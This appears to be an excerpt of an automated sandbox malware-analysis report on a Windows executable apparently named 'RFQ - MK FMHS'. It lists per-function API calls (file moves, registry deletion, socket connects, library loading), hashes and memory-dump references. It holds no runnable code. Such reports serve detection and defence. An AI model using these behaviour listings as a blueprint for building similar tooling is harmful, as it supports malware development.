                      • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED38D3,?), ref: 00ED48C7
                      • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED38D3,?), ref: 00ED48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 00ED38F3
                    • _wcscmp.LIBCMT ref: 00ED390F
                    • MoveFileW.KERNEL32(?,?), ref: 00ED3927
                    • _wcscat.LIBCMT ref: 00ED396F
                    • SHFileOperationW.SHELL32(?), ref: 00ED39DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: 253d2d0de57c9d6317caa85decb51ccc5919d1a85cc985b5b1c2f89f6f20786c
                    • Instruction ID: d005dc773e553cd5f6a40b3024f017534475e2e9f90c3441bb47bad5545e2dd1
                    • Opcode Fuzzy Hash: 253d2d0de57c9d6317caa85decb51ccc5919d1a85cc985b5b1c2f89f6f20786c
                    • Instruction Fuzzy Hash: 95417EB25093449ECB51EF64C4919EFB7E8EF88340F00292FB489E3251EA74D689C752
                    Function 00EF7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EF7519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF75C0
                    • IsMenu.USER32(?), ref: 00EF75D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF7620
                    • DrawMenuBar.USER32 ref: 00EF7633
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 7188522f2bb7bd9a2a3a3c173918b19ce989136e04198b95554fb3beb4d56589
                    • Instruction ID: 13a4cd8b38ad5ca4e0a35146ca851b352b2e893904bda5ee55c5e223afdae41c
                    • Opcode Fuzzy Hash: 7188522f2bb7bd9a2a3a3c173918b19ce989136e04198b95554fb3beb4d56589
                    • Instruction Fuzzy Hash: 1C412875A04608EFDB20DF94D884AAABBF9FF08314F059129EE55A7350D730AD54CFA0
                    Function 00EF122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EF125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF1286
                    • FreeLibrary.KERNEL32(00000000), ref: 00EF133D
                      • Part of subcall function 00EF122D: RegCloseKey.ADVAPI32(?), ref: 00EF12A3
                      • Part of subcall function 00EF122D: FreeLibrary.KERNEL32(?), ref: 00EF12F5
                      • Part of subcall function 00EF122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EF1318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EF12E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: 27fb59f247a989ebfe5ce4cc7718d0918dc3ba20bafe8c6bf055d05ef3e27f4d
                    • Instruction ID: cc52f0048640869a41f8923acebcd980d42e0dce3a704ae795e611cad8b9c9b7
                    • Opcode Fuzzy Hash: 27fb59f247a989ebfe5ce4cc7718d0918dc3ba20bafe8c6bf055d05ef3e27f4d
                    • Instruction Fuzzy Hash: 7F3109B190111DFFEB159B91DC89EFEB7BCEF08304F0051AAE601F2151EA749E49DAA4
                    Function 00EF653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EF655B
                    • GetWindowLongW.USER32(014B7648,000000F0), ref: 00EF658E
                    • GetWindowLongW.USER32(014B7648,000000F0), ref: 00EF65C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EF65F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EF661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00EF6630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EF664A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: 9acee9adc5fc5eaa86ee9990a4c9019f55b466c9b1ea713eedc27ae77a86904e
                    • Instruction ID: dd5517df3cc2f44a5bda95216241465ed58f5c3eb8955334ccfc311985fedfce
                    • Opcode Fuzzy Hash: 9acee9adc5fc5eaa86ee9990a4c9019f55b466c9b1ea713eedc27ae77a86904e
                    • Instruction Fuzzy Hash: 0F310331604118AFDB208F19DC84F6537E1FF4A328F1951A8F605EB2B6CB61AC44DB91
                    Function 00EE6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EE80A0: inet_addr.WSOCK32(00000000), ref: 00EE80CB
                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00EE64D9
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE64E8
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 00EE652A
                    • WSAGetLastError.WSOCK32 ref: 00EE6534
                    • closesocket.WSOCK32(00000000), ref: 00EE655D
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE6576
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: d94a74fe76a04468eb84543046a06f26b021bc33cc6c94a31187c2fb76661d9b
                    • Instruction ID: e6f8e4b4bdb631615f1f678c0923d7e7d9ca73a6f670b9159c2ef7c6a68f2c4b
                    • Opcode Fuzzy Hash: d94a74fe76a04468eb84543046a06f26b021bc33cc6c94a31187c2fb76661d9b
                    • Instruction Fuzzy Hash: BB31A171600118AFDB10AF25DC85BBE7BE8EF94764F009069F909B72D1CB70AD08CB61
                    Function 00ECE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE120
                    • SysAllocString.OLEAUT32(00000000), ref: 00ECE123
                    • SysAllocString.OLEAUT32 ref: 00ECE144
                    • SysFreeString.OLEAUT32 ref: 00ECE14D
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00ECE167
                    • SysAllocString.OLEAUT32(?), ref: 00ECE175
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    • Opcode ID: 1f735445b90f1bcc6171811f97eddece2dcb71c42bdf37584091a1bd8dd7f6b4
                    • Instruction ID: 0b80d3ba3076f283b143a596d6a66563bb436cc5225eb37d0d44096fe840ff1d
                    • Opcode Fuzzy Hash: 1f735445b90f1bcc6171811f97eddece2dcb71c42bdf37584091a1bd8dd7f6b4
                    • Instruction Fuzzy Hash: E421A132601108AF9B109FA9DD88DBB77ECEF49760B448129F914EB360DA71DC42CB64
                    Function 00ECFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: 718deaf38ff8c2c71e991b8f5301967882e744c16548f0219cc7bed8f631e8b0
                    • Instruction ID: 49a9adefa1611336c130d6d02bb3d8a25eaa137e9571f2d37ad253506bcd9200
                    • Opcode Fuzzy Hash: 718deaf38ff8c2c71e991b8f5301967882e744c16548f0219cc7bed8f631e8b0
                    • Instruction Fuzzy Hash: 04213A7220415166D630E634DE12FE7B3E9DF51354F14A03DF885B6181EB73AE83E2A5
                    Function 00EF783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
                      • Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
                      • Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EF78A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EF78AE
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EF78B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EF78C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EF78D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: 0165fae795f1ad804bb39d86d9cb34cb4bcfec1778e70c3564113c91befefc82
                    • Instruction ID: d802f4a06b36322d646b30c51015666d5f89ac1e016b6cb156e004209e995d8d
                    • Opcode Fuzzy Hash: 0165fae795f1ad804bb39d86d9cb34cb4bcfec1778e70c3564113c91befefc82
                    • Instruction Fuzzy Hash: 2B118EB211022DBEEF159E60CC85EE77F6DEF087A8F015124FB44A2090CB729C21DBA4
                    Function 00E941C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E94292,?), ref: 00E941E3
                    • GetProcAddress.KERNEL32(00000000), ref: 00E941EA
                    • EncodePointer.KERNEL32(00000000), ref: 00E941F6
                    • DecodePointer.KERNEL32(00000001,00E94292,?), ref: 00E94213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: e3296cfec77c54d87a669595548f3ea1b7c176bd421d2624c03d65183437c566
                    • Instruction ID: 7f9f9b08c6801b7605c1236169d4978f6c6096dee2b81566568ab2aa79870b9f
                    • Opcode Fuzzy Hash: e3296cfec77c54d87a669595548f3ea1b7c176bd421d2624c03d65183437c566
                    • Instruction Fuzzy Hash: 44E012B06917449EEF116B72EC4DF243696BB51716F504424F411F50F0DBF56495EF20
                    Function 00E9429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E941B8), ref: 00E942B8
                    • GetProcAddress.KERNEL32(00000000), ref: 00E942BF
                    • EncodePointer.KERNEL32(00000000), ref: 00E942CA
                    • DecodePointer.KERNEL32(00E941B8), ref: 00E942E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: cc2bb689d9805d28c0b7f752a30ce9729e5ad84dd5c274c130f963b22fd5e5e6
                    • Instruction ID: 7cdebf43aceba428a10d62c50bd6a441720b261045dd7972d20e2e34b9b3f516
                    • Opcode Fuzzy Hash: cc2bb689d9805d28c0b7f752a30ce9729e5ad84dd5c274c130f963b22fd5e5e6
                    • Instruction Fuzzy Hash: D7E0B6B8692705AFEB51AB61EC0DF153AA6BB64B56F104024F001F12F0CBB4A988FA15
                    Function 00ED675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: 9878d26070b011936cad77e1676243b9e2a31e5d9705435f175891a5af6f413f
                    • Instruction ID: 9f8a1b431f10ccb39d5747a8c1d13ed3ce982a487aa6ca9283ece15248dc7883
                    • Opcode Fuzzy Hash: 9878d26070b011936cad77e1676243b9e2a31e5d9705435f175891a5af6f413f
                    • Instruction Fuzzy Hash: 8161BB3050065A9BDF15EF20C882EFE37E5EF84308F04A55AF9597B292DB31AD42DB50
                    Function 00EF046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF0588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EF05AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EF05D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EF0617
                    • RegCloseKey.ADVAPI32(00000000), ref: 00EF0624
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: e49f951d1e52fd807d0ddcc0d0415d0c568a1550b1763e9d1ba92fde95dd5088
                    • Instruction ID: 86457dff544992663e5165cc0102a3c212c0432117c9e61274acd208a2751a24
                    • Opcode Fuzzy Hash: e49f951d1e52fd807d0ddcc0d0415d0c568a1550b1763e9d1ba92fde95dd5088
                    • Instruction Fuzzy Hash: 0D515C31208204AFCB14EF54C885E6FBBE9FF84314F04995DF699A72A2DB71E905CB52
                    Function 00EF5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetMenu.USER32(?), ref: 00EF5A82
                    • GetMenuItemCount.USER32(00000000), ref: 00EF5AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EF5AE1
                    • GetMenuItemID.USER32(?,?), ref: 00EF5B50
                    • GetSubMenu.USER32(?,?), ref: 00EF5B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00EF5BAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 63a21aaedbe1afe9b447c49c40e6cfbec5f33137864e7910807c4da933849f20
                    • Instruction ID: 76778880648d8c89d5eca813102daca1107fc69a6a4c8b1299faed80fa0ac80f
                    • Opcode Fuzzy Hash: 63a21aaedbe1afe9b447c49c40e6cfbec5f33137864e7910807c4da933849f20
                    • Instruction Fuzzy Hash: 60516C36A00A19AFCF15DF64C845ABEB7F4EF58320F1054A9EA15B7351DB30AE41CB90
                    Function 00ECF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00ECF3F7
                    • VariantClear.OLEAUT32(00000013), ref: 00ECF469
                    • VariantClear.OLEAUT32(00000000), ref: 00ECF4C4
                    • _memmove.LIBCMT ref: 00ECF4EE
                    • VariantClear.OLEAUT32(?), ref: 00ECF53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ECF569
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: 38633e829a3658198458d97982a19b8cf699ce4dba0464bbd892c93816e36114
                    • Instruction ID: f997d498c462ca7590d056fe1cf2ba65fea28bc8ea08f6a6ac055dde6b0b2af4
                    • Opcode Fuzzy Hash: 38633e829a3658198458d97982a19b8cf699ce4dba0464bbd892c93816e36114
                    • Instruction Fuzzy Hash: 5D516CB5A00209DFCB14CF58D880EAAB7B9FF4C314B158569ED59EB300D731E916CBA0
                    Function 00ED26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00ED2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2792
                    • IsMenu.USER32(00000000), ref: 00ED27B2
                    • CreatePopupMenu.USER32 ref: 00ED27E6
                    • GetMenuItemCount.USER32(000000FF), ref: 00ED2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00ED2875
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 1201d9d66cff68cf9a74e6726c97d68d68b9ae06cf890e0cea228c163bbc3d80
                    • Instruction ID: dd56ba3e98ac0ce4025484064cc9baba4e66ddce2d75f2dc51ea7c5d9572ed76
                    • Opcode Fuzzy Hash: 1201d9d66cff68cf9a74e6726c97d68d68b9ae06cf890e0cea228c163bbc3d80
                    • Instruction Fuzzy Hash: 7B519F74A00205DFDF28CF68D888AADBBF5EF64318F10526EE611BB390D7719906DB51
                    Function 00E71765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E7179A
                    • GetWindowRect.USER32(?,?), ref: 00E717FE
                    • ScreenToClient.USER32(?,?), ref: 00E7181B
